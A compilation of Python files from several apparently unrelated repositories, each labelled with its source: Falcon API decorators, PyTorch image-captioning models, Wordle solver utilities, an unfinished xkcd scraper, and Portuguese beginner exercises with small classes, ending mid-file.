cbar.set_label("Hit ratio", rotation=90)
##### data plotting
for i in range(0, len(hit_ratios)):
rgb_code = colormap.to_rgba(x=hit_ratios[i], alpha=0.999, bytes=False, norm=True)
axes.plot(backtest_lengths, ratio_profitable_strategies[:,i], color=rgb_code, linewidth=1.5, alpha=0.3)
plt.show()
``` |
{
"source": "joaodobread/python-falcon-api",
"score": 3
} |
#### File: common/decorators/roles.py
```python
import functools
def Roles(*roles: str):
"""add roles to class. with roles can be blocked user without access"""
def wrapper(original_class):
orig_init = original_class.__init__
@functools.wraps(original_class)
def __init__(self, *args, **kws):
self.falcon_security__roles = [*roles]
self.falcon_security__unprotected = False
orig_init(self, *args, **kws)
original_class.__init__ = __init__
return original_class
return wrapper
```
#### File: common/decorators/unprotected.py
```python
import functools
def Unprotected():
"""add unprotected attribute to route"""
def wrapper(original_class):
orig_init = original_class.__init__
@functools.wraps(original_class)
def __init__(self, *args, **kws):
self.falcon_security__roles = []
self.falcon_security__unprotected = True
orig_init(self, *args, **kws)
original_class.__init__ = __init__
return original_class
return wrapper
``` |
{
"source": "joao-d-oliveira/CV-Image_Captioning",
"score": 3
} |
#### File: joao-d-oliveira/CV-Image_Captioning/model.py
```python
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
###
# Added for comparasitation of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class EncoderCNNv1(nn.Module):
def __init__(self, embed_size):
super(EncoderCNNv1, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
# first, we need to resize the tensor to be
# (batch, size*size, feature_maps)
batch, feature_maps, size_1, size_2 = features.size()
features = features.permute(0, 2, 3, 1)
features = features.view(batch, size_1*size_2, feature_maps)
return features
# Simplest Decoder
class DecoderRNNv101(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# LSTM Layer: Do the magic of finding the next word
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
batch_size = features.shape[0]
lstm_outputs, _ = self.lstm(embed, self.init_hidden(batch_size))
out = self.linear(lstm_outputs)
return out
def sample(self, features, states=None, end_word = 1, max_len=20):
output_ids = []
inputs = features.unsqueeze(1)
for i in range(max_len):
# pass data through recurrent network
hiddens, states = self.lstm(inputs, states)
outputs = self.linear(hiddens.squeeze(1))
# find maximal predictions
predicted = outputs.max(1)[1]
# append results from given step to global results
output_ids.append(predicted.cpu().numpy()[0].item())
# prepare chosen words for next decoding step
inputs = self.embedding(predicted)
inputs = inputs.unsqueeze(1)
# arrived to the end of the sentence
if predicted == end_word : break
return output_ids
# taken from the previous lesson
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Slightly more complex than v101 with a Linear layer as states from LSTM
# proved that performs better
class DecoderRNNv102(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
out = self.linear(lstm_outputs)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
# Either get hidden states already from pretrained or initialize
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
lstm_out, hidden = self.lstm(inputs, hidden)
outputs = self.linear(lstm_out)
outputs = outputs.squeeze(1)
# get the word with the best ranking
_, found_word = torch.max(outputs, dim=1)
# save new word
output.append(found_word.cpu().numpy()[0].item()) # storing the word predicted
# In case new word is the end of the sentence... end the sampling
if found_word == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(found_word)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Added a MultiHeadAttention Layer after the LSTM, trying to focus the attention after LSTM
# Then performing the operations with EMB -> LSTM -> Attention -> Linear
class DecoderRNNv120(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, num_heads=8):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
self.num_heads = num_heads
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# Get the focus from features where it should
self.attention = nn.MultiheadAttention(hidden_size, num_heads)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
att_out, _ = self.attention(lstm_outputs, lstm_outputs, lstm_outputs)
out = self.linear(att_out)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
lstm_out, hidden = self.lstm(inputs, hidden)
outputs, _ = self.attention(lstm_out, lstm_out, lstm_out)
outputs = self.linear(outputs)
outputs = outputs.squeeze(1)
# get the word with the best ranking
_, max_indice = torch.max(outputs, dim=1)
# save new word
output.append(max_indice.cpu().numpy()[0].item()) # storing the word predicted
# In case new word is the end of the sentence... end the sampling
if max_indice == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(max_indice)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Added a MultiHeadAttention Layer before, trying to focus the attention first at features
# It actually performs better than the v120
# Then performing the operations with EMB -> Attention -> LSTM -> Linear
class DecoderRNNv121(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, num_heads=8):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
self.num_heads = num_heads
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# Get the focus from features where it should
self.attention = nn.MultiheadAttention(embed_size, num_heads)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
att_out, _ = self.attention(lstm_outputs, lstm_outputs, lstm_outputs)
out = self.linear(att_out)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
outputs, _ = self.attention(inputs, inputs, inputs)
outputs, hidden = self.lstm(outputs, hidden)
outputs = self.linear(outputs)
outputs = outputs.squeeze(1)
_, found_word = torch.max(outputs, dim=1) # predict the most likely next word, found_word shape : (1)
# save new word
output.append(found_word.cpu().numpy()[0].item())
# In case new word is the end of the sentence... end the sampling
if found_word == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(found_word)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
###
# Added for comparasitation of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class BahdanauAttention(nn.Module):
""" Class performs Additive Bahdanau Attention.
Source: https://arxiv.org/pdf/1409.0473.pdf
"""
def __init__(self, num_features, hidden_dim, output_dim = 1):
super(BahdanauAttention, self).__init__()
self.num_features = num_features
self.hidden_dim = hidden_dim
self.output_dim = output_dim
# fully-connected layer to learn first weight matrix Wa
self.W_a = nn.Linear(self.num_features, self.hidden_dim)
# fully-connected layer to learn the second weight matrix Ua
self.U_a = nn.Linear(self.hidden_dim, self.hidden_dim)
# fully-connected layer to produce score (output), learning weight matrix va
self.v_a = nn.Linear(self.hidden_dim, self.output_dim)
def forward(self, features, decoder_hidden):
"""
Arguments:
----------
- features - features returned from Encoder
- decoder_hidden - hidden state output from Decoder
Returns:
---------
- context - context vector with a size of (1,2048)
- atten_weight - probabilities, express the feature relevance
"""
# add additional dimension to a hidden (required for summation)
decoder_hidden = decoder_hidden.unsqueeze(1)
atten_1 = self.W_a(features)
atten_2 = self.U_a(decoder_hidden)
# apply tangent to combine result from 2 fc layers
atten_tan = torch.tanh(atten_1+atten_2)
atten_score = self.v_a(atten_tan)
atten_weight = F.softmax(atten_score, dim = 1)
# first, we will multiply each vector by its softmax score
# next, we will sum up this vectors, producing the attention context vector
# the size of context equals to a number of feature maps
context = torch.sum(atten_weight * features, dim = 1)
atten_weight = atten_weight.squeeze(dim=2)
return context, atten_weight
###
# Added for comparasitation of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class DecoderRNNv200(nn.Module):
"""Attributes:
- embedding_dim - specified size of embeddings;
- hidden_dim - the size of RNN layer (number of hidden states)
- vocab_size - size of vocabulary
- p - dropout probability
"""
def __init__(self, num_features, embedding_dim, hidden_dim, vocab_size, p =0.5):
super(DecoderRNNv200, self).__init__()
self.num_features = num_features
self.embedding_dim = embedding_dim
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
# scale the inputs to softmax
self.sample_temp = 0.5
# embedding layer that turns words into a vector of a specified size
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
# LSTM will have a single layer of size 512 (512 hidden units)
# it will input concatinated context vector (produced by attention)
# and corresponding hidden state of Decoder
self.lstm = nn.LSTMCell(embedding_dim + num_features, hidden_dim)
# produce the final output
self.fc = nn.Linear(hidden_dim, vocab_size)
# add attention layer
self.attention = BahdanauAttention(num_features, hidden_dim)
# dropout layer
self.drop = nn.Dropout(p=p)
# add initialization fully-connected layers
# initialize hidden state and cell memory using average feature vector
# Source: https://arxiv.org/pdf/1502.03044.pdf
self.init_h = nn.Linear(num_features, hidden_dim)
self.init_c = nn.Linear(num_features, hidden_dim)
def forward(self, captions, features, sample_prob = 0.0):
import numpy as np
embed = self.embeddings(captions)
h, c = self.init_hidden(features)
seq_len = captions.size(1)
feature_size = features.size(1)
batch_size = features.size(0)
# these tensors will store the outputs from lstm cell and attention weights
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
outputs = torch.zeros(batch_size, seq_len, self.vocab_size).to(device)
atten_weights = torch.zeros(batch_size, seq_len, feature_size).to(device)
# scheduled sampling for training
# we do not use it at the first timestep (<start> word)
# but later we check if the probability is bigger than random
for t in range(seq_len):
sample_prob = 0.0 if t == 0 else 0.5
use_sampling = np.random.random() < sample_prob
if use_sampling == False:
word_embed = embed[:,t,:]
context, atten_weight = self.attention(features, h)
# input_concat shape at time step t = (batch, embedding_dim + hidden_dim)
input_concat = torch.cat([word_embed, context], 1)
h, c = self.lstm(input_concat, (h,c))
h = self.drop(h)
output = self.fc(h)
if use_sampling == True:
# use sampling temperature to amplify the values before applying softmax
scaled_output = output / self.sample_temp
scoring = F.log_softmax(scaled_output, dim=1)
top_idx = scoring.topk(1)[1]
word_embed = self.embeddings(top_idx).squeeze(1)
outputs[:, t, :] = output
#atten_weights[:, t, :] = atten_weights
return outputs, atten_weights
def init_hidden(self, features):
"""Initializes hidden state and cell memory using average feature vector.
Arguments:
----------
- features - features returned from Encoder
Retruns:
----------
- h0 - initial hidden state (short-term memory)
- c0 - initial cell state (long-term memory)
"""
mean_annotations = torch.mean(features, dim = 1)
h0 = self.init_h(mean_annotations)
c0 = self.init_c(mean_annotations)
return h0, c0
def sample(self, features, max_sentence = 20):
"""Greedy search to sample top candidate from distribution.
Arguments
----------
- features - features returned from Encoder
- max_sentence - max number of token per caption (default=20)
Returns:
----------
- sentence - list of tokens
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
sentence = []
weights = []
input_word = torch.tensor(0).unsqueeze(0).to(device)
h, c = self.init_hidden(features)
while True:
embedded_word = self.embeddings(input_word)
context, atten_weight = self.attention(features, h)
# input_concat shape at time step t = (batch, embedding_dim + context size)
input_concat = torch.cat([embedded_word, context], dim = 1)
h, c = self.lstm(input_concat, (h,c))
h = self.drop(h)
output = self.fc(h)
scoring = F.log_softmax(output, dim=1)
top_idx = scoring[0].topk(1)[1]
sentence.append(top_idx.item())
weights.append(atten_weight)
input_word = top_idx
if (len(sentence) >= max_sentence or top_idx == 1):
break
return sentence, weights
``` |
{
"source": "joao-d-oliveira/wordle_solver",
"score": 3
} |
#### File: wordle_solver/utils/util_helper.py
```python
def process_params(param, default, all_args):
value = default
if param in all_args:
sub_val = all_args[all_args.find(param) + len(param):]
sub_val = sub_val[:sub_val.find('--') if '--' in sub_val else len(sub_val)].strip()
# SPECIFIC APP cases (try to avoid)
if param == '--game':
if '[' in sub_val: sub_val = sub_val[1:-1]
value = []
for e in sub_val.split(','):
if e.count('-') == 1:
fr_, to_ = int(e.split('-')[0].strip()), int(e.split('-')[1].strip())
value += list(range(fr_, to_ + 1))
elif e.count('-') == 2:
import datetime
value.append(datetime.datetime.strptime(e.strip(), '%Y-%m-%d'))
elif e.count('-') == 0:
value.append(int(e))
return value
if type(value) == bool:
assert sub_val in ['True', 'False'], f'error in param: {param} should be True or False'
value = True if sub_val == 'True' else False
elif type(value) == int:
value = int(sub_val)
elif type(value) == list:
# remove parenteses
sub_val = sub_val[1:-1]
if '[' not in sub_val: sub_val = [a.strip() for a in sub_val.split(',')]
else: sub_val = [[int(b) for b in a.replace('[','').replace(']','').split(',')] for a in sub_val.replace(' ','').split('],[')]
value = sub_val
else:
value = sub_val.replace("'", '')
return value
def print_colored(word_try, results):
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
dict_color = {1: G, 0: O, -1:R}
print('tried: ', end='')
for l, c in zip(word_try, results):
print(f"{dict_color[c]}{l}{dict_color[c]}", end='')
print(f"{W}")
def print_time(start, stop):
duration = stop - start
h = int(duration // (60 * 60))
duration -= h * (60 * 60)
m = int(duration // 60)
duration -= m * 60
s = int(duration)
duration -= s
ms = f"{duration:.2f}".split('.')[-1]
return f"{str(h).zfill(2)}:{str(m).zfill(2)}:{str(s).zfill(2):}.{ms}"
```
#### File: wordle_solver/utils/wordle_algo.py
```python
def solve_worldle(date_of_challenge):
import datetime
Ma = open('corpus/wordle_av.txt', 'r').read().split('\n')
Ga = datetime.datetime(2021, 6, 19, 0, 0, 0, 0).replace(hour=0, minute=0, second=0, microsecond=0)
date_of_challenge_ = date_of_challenge.replace(hour=0, minute=0, second=0, microsecond=0)
diff = date_of_challenge_ - Ga
pos_ = int(round(diff.total_seconds() * 1000 / 864e5))
pos = pos_ % len(Ma)
return Ma[pos]
``` |
{
"source": "joaoDragado/web_scraping",
"score": 4
} |
#### File: web_scraping/xkcd/multi_thread_xkcd.py
```python
''' ## Implementation ##
1. Download pages with the requests module.
2. Find the URL of the comic image for a page using Beautiful Soup.
3. Download & save comic image locally with iter_content() .
4. Find the URL of the Previous Comic link, and repeat.
'''
''' ## Targeted HTML elements ##
1a. The URL of the comic’s image file is in the href attribute of an <img> element.
1b. The <img> element is inside a <div id="comic"> element.
2. The Prev button has a rel HTML attribute with value=prev .
3. The 1st comic’s Prev button links to the http://xkcd.com/# URL, indicating that there are no more previous pages.
'''
import requests, os, bs4, threading
# starting url
base_url = 'http://xkcd.com'
# store comics in /xkcd ; exist_ok param since py3.2
os.makedirs('xkcd')
# initialize url
def download_comics(start_page, end_page)
for url in xrange(start_page, end_page):
# 1. Download the page.
print 'Downlaoding page {}...'.format(url)
r = requests.get(url)
try:
r.raise_for_status()
except Exception as exc:
print 'There was a problem : {}'.format(exc)
#create BeuatifulSoup object, store web page
soup = bs4.BeautifulSoup(res.text)
# 2. Find the URL of the comic image.
comic_elem = soup.select('#comic img')
if comic_elem == []:
print 'Could not find image element.'
else:
comic_url = comic_elem[0].get('src')
# 3a. Download the image.
print 'Downloading image {}'.format(comic_url)
r = requests.get(comic_url)
try:
r.raise_for_status()
except Exception as exc:
print 'There was a problem : {}'.format(exc)
# 3b. Save the image to ./xkcd
with open(os.path.join('xkcd', os.path.basename(comic_url), 'wb') as image_file:
for tranche in r.iter_content(10000):
image_file.write(tranche)
# TODO: Create and start the Thread objects.
# TODO: Wait for all threads to end.
print 'All Done!!'
``` |
{
"source": "JoaoEmanuell/Meus-Estudos-Python",
"score": 2
} |
#### File: Aulas/Mundo 3/097.py
```python
def escreva(msg):
tam = len(msg) + 4
print('~' * tam)
print(f' {msg}')
print('~' * tam)
escreva('<NAME>')
escreva('oi')
escreva('Massa')
```
#### File: Aulas/Mundo 3/098.py
```python
from time import sleep
def linha():
print('-' * 30)
def contador(i, f, p):
print('-' * 30)
print(f'Contagem de {i} ate {f} de {p} em {p}')
print('-' * 30)
if i < f:
cont = i
while cont <= f:
print(f'{cont}', end=' ')
cont += p
sleep(0.30)
else:
cont = i
while cont >= f:
print(f'{cont}', end=' ')
cont -= p
sleep(0.30)
contador(1, 10, 1)
print()
contador(10, 0, 2)
print()
linha()
print('Sua vez')
linha()
i = int(input('Inicio '))
f = int(input('Fim '))
p = int(input('Passo '))
contador(i, f, p)
```
#### File: Aulas/Mundo 3/100.py
```python
from random import randint
from time import sleep
valores = []
def aleatorio():
print('Sorteando 5 valores da lista: ', end='')
for c in range(0, 5):
valores.append(randint(1, 10))
for v in valores:
print(f'{v}', end=' ')
sleep(0.3)
def soma():
pares = 0
print(f'Somando os valores pares de {valores},', end=' ')
sleep(1)
for v in valores:
if v % 2 == 0:
pares += v
print(f'a soma de todos os valores pares é igual a {pares}')
aleatorio()
print()
soma()
```
#### File: Aulas/Mundo 3/101.py
```python
def ano(n=0):
from datetime import date#ao fazer a importação somente durante a execução da função, vc economiza memoria
idade = date.today().year - n
if idade >= 18 and idade <= 70:
return (f'Com {idade} anos o voto é \033[1:31mOBRIGATORIO\033[m')
if idade >= 16 and idade <= 17 or idade >= 65:
return (f'Com {idade} anos o voto é \033[1:31mOPCIONAL\033[m')
if idade <= 15:
return (f'Com {idade} anos \033[1:31mNão\033[m vota')
i = int(input('Em que ano você nasceu? '))
print(ano(i))
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_bichinho_virtual++.py
```python
class bichinho():
"""[Classe bixinho, essa classe possui 6 metodos e um __init__]
"""
def __init__(self, nome, fome = 10, saude = 100, idade = 1):
"""[Inicia a classe]
Args:
nome ([str]): [Nome do bichinho]
fome (int, optional): [Porcentagem da fome do bichinho]. Defaults to 10.
saude (int, optional): [Porcentagem da saude do bichinho]. Defaults to 100.
idade (int, optional): [Idade do bichinho]. Defaults to 1.
"""
self.nome = nome
self.fome = fome
self.saude = saude
self.idade = idade
def status(self):
"""[Descreve o status do bichinho]
Returns:
[str]: [Retorna o estado do bichinho]
"""
print (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor()
return (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
def alterar_nome(self):
"""[função para alterar o nome do bichinho]
Returns:
[str]: [Retorna o novo nome do bichinho]
"""
self.nome = str(input("Qual o novo nome do bichinho? "))
print (f"O novo nome do bichinho é {self.nome}")
bichinho.novo_humor()
return (f"O novo nome do bichinho é {self.nome}")
def alterar_fome(self):
"""[função para alterar a fome do bichinho]
Returns:
[str]: [Retorna a porcentagem da fome do bichinho]
"""
self.fome = abs(int(input(f"Qual a nova porcentagem de fome de {self.nome}? ")))
print (f"A fome de {self.nome} está em {self.fome}%")
bichinho.novo_humor()
return (f"A fome de {self.nome} está em {self.fome}%")
def alterar_saude(self):
"""[função para alterar a saúde do bichinho]
Returns:
[str]: [Retorna a porcentagem da saúde do bichinho]
"""
self.saude = abs(int(input(f"Qual a nova porcentagem de saude de {self.nome}? ")))
print (f"A saúde de {self.nome} está em {self.saude}%")
bichinho.novo_humor()
return (f"A saúde de {self.nome} está em {self.saude}%")
def alterar_idade(self):
"""[Função para alterar a idade do bichinho]
Returns:
[str]: [Idade do bichinho]
"""
self.idade = abs(int(input(f"Qual a nova idade de {self.nome}? ")))
print (f"A idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor()
return (f"A idade de {self.nome} é {self.idade} anos")
def novo_humor(self):
"""
[Serve para calcular o humor do bichinho, baseado na sua fome e saúde]
"""
if self.fome > 75 or self.saude < 25 or self.brincar < 2:
self.humor = print(f'{self.nome} está Irritado')
elif self.fome > 50 or self.saude < 50 or self.brincar < 5:
self.humor = print(f'{self.nome} está Triste')
elif self.fome > 25 or self.saude < 75 or self.brincar < 10:
self.humor = print(f'{self.nome} está Feliz')
else:
self.humor = print(f'{self.nome} está Muito feliz')
def brincar(self):
"""[Serve para informar quanto tempo você deseja brincar com o bichinho]
"""
tempo = abs(float(input(f"Por quanto minutos deseja brincar com {self.nome}? ")))
self.brincar = tempo
return self.brincar
bichinho = bichinho("Midas")
bichinho.brincar()
bichinho.status()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_carro.py
```python
class carro():
def __init__(self, consumo = 10, combustível = 0):
"""[summary]
Args:
consumo (int, optional): [consumo de gasolina por litro]. Defaults to 10.
combustível (float, optional): [quantidade total de gasolina do carro]. Defaults to 0.
"""
self.consumo = consumo
self.combustivel = combustível
def andar(self):
"""[pergunta quantos km devem ser andados, depois divide a distancia pecorrida pelo total de consumo do carro e subtrai isso do combustivel, se o combustivel for inferior a 0, o combustivel recebe 0, escreva "A gasolina acabou", chame a função obterGasolina e retorne Falso, senão escreva "O carro andou {distancia} km, e consumiu {consumo} litros de combustivel" e retorne o consumo]
Returns:
[float]: [retorna o consumo de gasolina]
"""
distancia = float(input("Deseja andar quantos km? "))
consumo = distancia / self.consumo
self.combustivel -= consumo
if self.combustivel < 0:
self.combustivel = 0
print("A gasolina acabou")
carro.obterGasolina(self)
return False
else:
print(f"O carro andou {distancia} km, e consumiu {consumo} litros de combustivel")
return consumo
def obterGasolina(self):
"""[mostra o nivel de gasolina]
Returns:
[float]: [retorna o total de combustivel do carro]
"""
print(f"O nivel de gasolina é {self.combustivel} litros")
return self.combustivel
def adicionarGasolina(self):
"""[serve para adicionar gasolina ao carro, pergunta quantos litros serão colocados, o self.combustivel += quantidade, escreve "sucesso..." retorna o numero de litros adicionados]
"""
gasolina = float(input("Quantos litros de gasolina serão colocados? "))
self.combustivel += gasolina
print(f"Sucesso, adicionado {gasolina} litros de gasolina no carro")
return(gasolina)
carrinho = carro(combustível = 100)
carrinho.andar()
carrinho.obterGasolina()
carrinho.adicionarGasolina()
carrinho.obterGasolina()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_conta_corrente.py
```python
class conta():
def __init__(self, num, corren, saldo = (0.0)):
"""[class de conta bancaria, def __init__]
Args:
num ([int]): [Numero da conta]
corren ([str]): [Nome do correntista]
saldo (tuple, float): [Numero do saldo da conta]. Defaults to (0.0).
"""
self.num = num
self.corren = corren
self.saldo = saldo
def alterarnome(self):
self.nome = str(input("Qual o novo nome do correntista? "))
return (f"O novo nome do correntista é {self.nome}")
def deposito(self):
self.saldo += float(input("Qual o valor a ser depositado? R$ "))
return (f"O novo saldo da conta é R$ {self.saldo}")
def saque(self):
saldo = float(input("Qual o valor a ser sacado? R$ "))
if (self.saldo < saldo):
return(f"Desculpe, o valor de saque que você deseja é superior ao seu saldo\n"
f"Seu saldo é {self.saldo}")
else:
self.saldo -= saldo
return(f"Saque realizado com sucesso\n"
f"Seu novo saldo é {self.saldo} reais")
#codigo principal
p1 = conta(150, 'João', 1000)
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_fazenda_de_bichinhos.py
```python
from random import randint
class bichinho():
"""[Classe bixinho, essa classe possui 6 metodos e um __init__]
"""
def __init__(self, nome, fome = randint(1, 100), saude = randint(1, 100), idade = randint(1, 5), humor = 100):
"""[Inicia a classe]
Args:
nome ([str]): [Nome do bichinho]
fome (int, optional): [Porcentagem da fome do bichinho]. Defaults to 10.
saude (int, optional): [Porcentagem da saude do bichinho]. Defaults to 100.
idade (int, optional): [Idade do bichinho]. Defaults to 1.
"""
self.nome = nome
self.fome = fome
self.saude = saude
self.idade = idade
self.brincarr = humor
def status(self):
"""[Descreve o status do bichinho]
Returns:
[str]: [Retorna o estado do bichinho]
"""
print (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor(self)
return (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
def alterar_nome(self):
"""[função para alterar o nome do bichinho]
Returns:
[str]: [Retorna o novo nome do bichinho]
"""
self.nome = str(input("Qual o novo nome do bichinho? "))
print (f"O novo nome do bichinho é {self.nome}")
bichinho.novo_humor()
return (f"O novo nome do bichinho é {self.nome}")
def alterar_fome(self):
"""[função para alterar a fome do bichinho]
Returns:
[str]: [Retorna a porcentagem da fome do bichinho]
"""
self.fome = abs(int(input(f"Qual a nova porcentagem de fome de {self.nome}? ")))
print (f"A fome de {self.nome} está em {self.fome}%")
bichinho.novo_humor()
return (f"A fome de {self.nome} está em {self.fome}%")
def alterar_saude(self):
